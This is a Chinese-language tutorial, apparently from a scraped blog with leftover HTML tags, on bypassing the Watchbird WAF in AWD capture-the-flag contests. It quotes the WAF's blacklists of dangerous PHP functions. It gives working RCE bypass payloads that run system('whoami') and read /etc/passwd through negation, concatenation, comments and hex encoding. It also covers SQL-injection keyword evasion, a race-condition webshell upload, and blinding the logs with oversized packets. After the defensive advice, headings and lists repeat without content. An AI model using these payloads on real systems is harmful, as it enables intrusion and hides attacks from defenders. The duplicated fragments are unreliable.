Watchbird WAF 白盒审计与绕过技术详解<\/h1>

1. Watchbird WAF 简介<\/h2>
Watchbird 是一款针对 AWD (Attack With Defense) 比赛设计的开源 WAF (Web Application Firewall)，项目地址：https:\/\/github.com\/leohearts\/awd-watchbird<\/p>

主要功能特点：<\/h3>

实时流量监控与拦截<\/li>
攻击日志记录功能<\/li>
基于黑白名单的规则过滤<\/li>

内置常见攻击模式检测<\/li> <\/ul>

2. WAF 后台日志分析<\/h2>

Watchbird 后台日志分为两部分：<\/p>

绿色区域<\/strong>：记录不受拦截的流量日志（正常流量或绕过 WAF 的流量）<\/li>

红色区域<\/strong>：记录拦截到的攻击流量<\/li> <\/ol>
3. RCE 黑名单绕过技术<\/h2>
3.1 Watchbird 的 RCE 黑名单规则<\/h3>
public<\/span> $rce_blacklist =<\/span> "\/\`|var_dump|str_rot13|serialize|base64_encode|base64_decode|strrev|eval\(|assert|file_put_contents|fwrite|curl_exec\(|dl\(|readlink|popepassthru|preg_replace|preg_filter|mb_ereg_replace|register_shutdown_function|register_tick_function|create_function|array_map|array_reduce|uasort|uksort|array_udiff|array_walk|call_user_func|array_filter|usort|stream_socket_server|pcntl_exec|passthru|exec(|system(|chroot\(|scandir\(|chgrp\(|chown|shell_exec|proc_open|proc_get_status|popen\(|ini_alter|ini_restore|ini_set|LD_PRELOAD|ini_alter|ini_restore|ini_set|base64 -d\/i"<\/span>; <\/span><\/span><\/code><\/pre>3.2 绕过技术<\/h3> 方法1：取反绕过<\/h4> 原理<\/strong>：利用 PHP 的位运算取反特性(~)构造函数名<\/p> Payload<\/strong>:<\/p> ?file=(~%8C%86%8C%8B%9A%92)(~%88%97%90%9E%92%96); <\/code><\/pre> 解释<\/strong>：<\/p> ~%8C%86%8C%8B%9A%92<\/code> 解码后为 system<\/code><\/li> ~%88%97%90%9E%92%96<\/code> 解码后为 whoami<\/code><\/li> 组合起来相当于执行 system('whoami');<\/code><\/li> <\/ul> 方法2：字符串拼接绕过<\/h4> 原理<\/strong>：将函数名拆分为多个部分进行拼接<\/p> Payload<\/strong>:<\/p> ?file=(sy.(st).em)(whoami); <\/code><\/pre> 方法3：内联注释绕过<\/h4> 原理<\/strong>：在函数名中插入注释分隔符<\/p> Payload<\/strong>:<\/p> ?file=(sy.\/*caixukun*\/(st)\/*caixukun*\/.em)\/*caixukun*\/(wh.\/*caixukun*\/(oa)\/*caixukun*\/.mi); <\/code><\/pre> 方法4：十六进制编码绕过<\/h4> 原理<\/strong>：使用十六进制编码表示函数名<\/p> Payload<\/strong>:<\/p> ?file="\x73\x79\x73\x74\x65\x6d"("cat \/etc\/passwd"); <\/code><\/pre> 编码转换脚本<\/strong>:<\/p> def<\/span> string_to_hex_str<\/span>(s): <\/span><\/span> # 编码为字节，然后格式化每个字节为十六进制字符串，并连接它们<\/span> <\/span><\/span> return<\/span> ''<\/span>.<\/span>join('<\/span>\\<\/span>x<\/span>{:02x}<\/span>'<\/span>.<\/span>format(b) for<\/span> b in<\/span> s.<\/span>encode('utf-8'<\/span>)) <\/span><\/span> <\/span><\/span>s =<\/span> "system"<\/span> <\/span><\/span>hex_encoded_str =<\/span> string_to_hex_str(s) <\/span><\/span>print(hex_encoded_str) # 输出: \x73\x79\x73\x74\x65\x6d<\/span> <\/span><\/span><\/code><\/pre>4. SQL 注入黑名单绕过<\/h2> 4.1 Watchbird 的 SQL 黑名单规则<\/h3> public<\/span> $sql_blacklist =<\/span> "\/drop |dumpfile\b|INTO FILE|union select|outfile\b|load_file\b|multipoint\(\/i"<\/span>; <\/span><\/span><\/code><\/pre>4.2 绕过方法<\/h3> 空格绕过<\/strong>：在 union select<\/code> 中间插入多个空格<\/li> 大小写混合<\/strong>：使用 UnIoN SeLeCt<\/code><\/li> 注释分隔<\/strong>：使用 union\/**\/select<\/code><\/li> <\/ul> 5. 文件上传绕过理论<\/h2> 5.1 Watchbird 文件上传检测机制<\/h3> 使用白名单检测<\/li> 先上传文件，再检测，检测到有问题再删除<\/li> <\/ul> 5.2 潜在绕过方法：条件竞争<\/h3> 上传一个能生成新木马的 PHP 文件<\/li> 同时不断访问该文件<\/li> 在检测删除前成功创建新 shell<\/li> <\/ol> 限制因素<\/strong>：<\/p> AWD 比赛时间短，条件竞争产出慢<\/li> WAF 自带 DDoS 防御功能，爆破时 70% 以上数据包会被拦截<\/li> <\/ul> 6. 绕过流量日志监测<\/h2> 6.1 日志机制特点<\/h3> 单个日志最大 40,000 个字符<\/li> 超出最大值时会删除全部日志<\/li> <\/ul> 6.2 绕过方法<\/h3> 发送超大 payload 数据包（>40,000 字符）<\/li> 填入大量脏数据使日志超出限制<\/li> 效果：后台不会显示这条日志记录（但 WAF 仍会拦截关键词）<\/li> <\/ul> 7. 总结与防御建议<\/h2> 7.1 Watchbird WAF 的弱点<\/h3> 基于黑白名单的过滤机制存在固有缺陷<\/li> 项目年久失修（虽然仅 1-2 年）<\/li> 缺乏语义分析和 AI 识别能力<\/li> <\/ol> 7.2 防御建议<\/h3> 更新 WAF 规则，补充遗漏的危险函数（如 putenv()<\/code>）<\/li> 实现更严格的语法分析而非简单字符串匹配<\/li> 考虑使用现代 WAF 解决方案（如基于 AI\/ML 的 WAF）<\/li> 对上传文件采用更安全的处理流程（如先检测后上传）<\/li> <\/ol> 7.3 比赛中的应用<\/h3> 在 AWD 比赛中遇到 Watchbird WAF 时，可以尝试：<\/p> 各种 RCE 绕过技术<\/li> SQL 注入的简单绕过<\/li> 条件竞争文件上传（时间允许时）<\/li> 大流量日志致盲技术<\/li> <\/ol>

Watchbird WAF 白盒审计与绕过技术详解<\/h1>

1. Watchbird WAF 简介<\/h2> Watchbird 是一款针对 AWD (Attack With Defense) 比赛设计的开源 WAF (Web Application Firewall)，项目地址：https:\/\/github.com\/leohearts\/awd-watchbird<\/p>

3. RCE 黑名单绕过技术<\/h2>

3.2 绕过技术<\/h3>

4. SQL 注入黑名单绕过<\/h2>

5. 文件上传绕过理论<\/h2>

6. 绕过流量日志监测<\/h2>

7. 总结与防御建议<\/h2>

7.3 比赛中的应用<\/h3> 在 AWD 比赛中遇到 Watchbird WAF 时，可以尝试：<\/p> 各种 RCE 绕过技术<\/li> SQL 注入的简单绕过<\/li> 条件竞争文件上传（时间允许时）<\/li> 大流量日志致盲技术<\/li> <\/ol>

1. Watchbird WAF 简介<\/h2>
Watchbird 是一款针对 AWD (Attack With Defense) 比赛设计的开源 WAF (Web Application Firewall)，项目地址：https:\/\/github.com\/leohearts\/awd-watchbird<\/p>

7.3 比赛中的应用<\/h3>
在 AWD 比赛中遇到 Watchbird WAF 时，可以尝试：<\/p>

各种 RCE 绕过技术<\/li>
SQL 注入的简单绕过<\/li>
条件竞争文件上传（时间允许时）<\/li>
大流量日志致盲技术<\/li> <\/ol>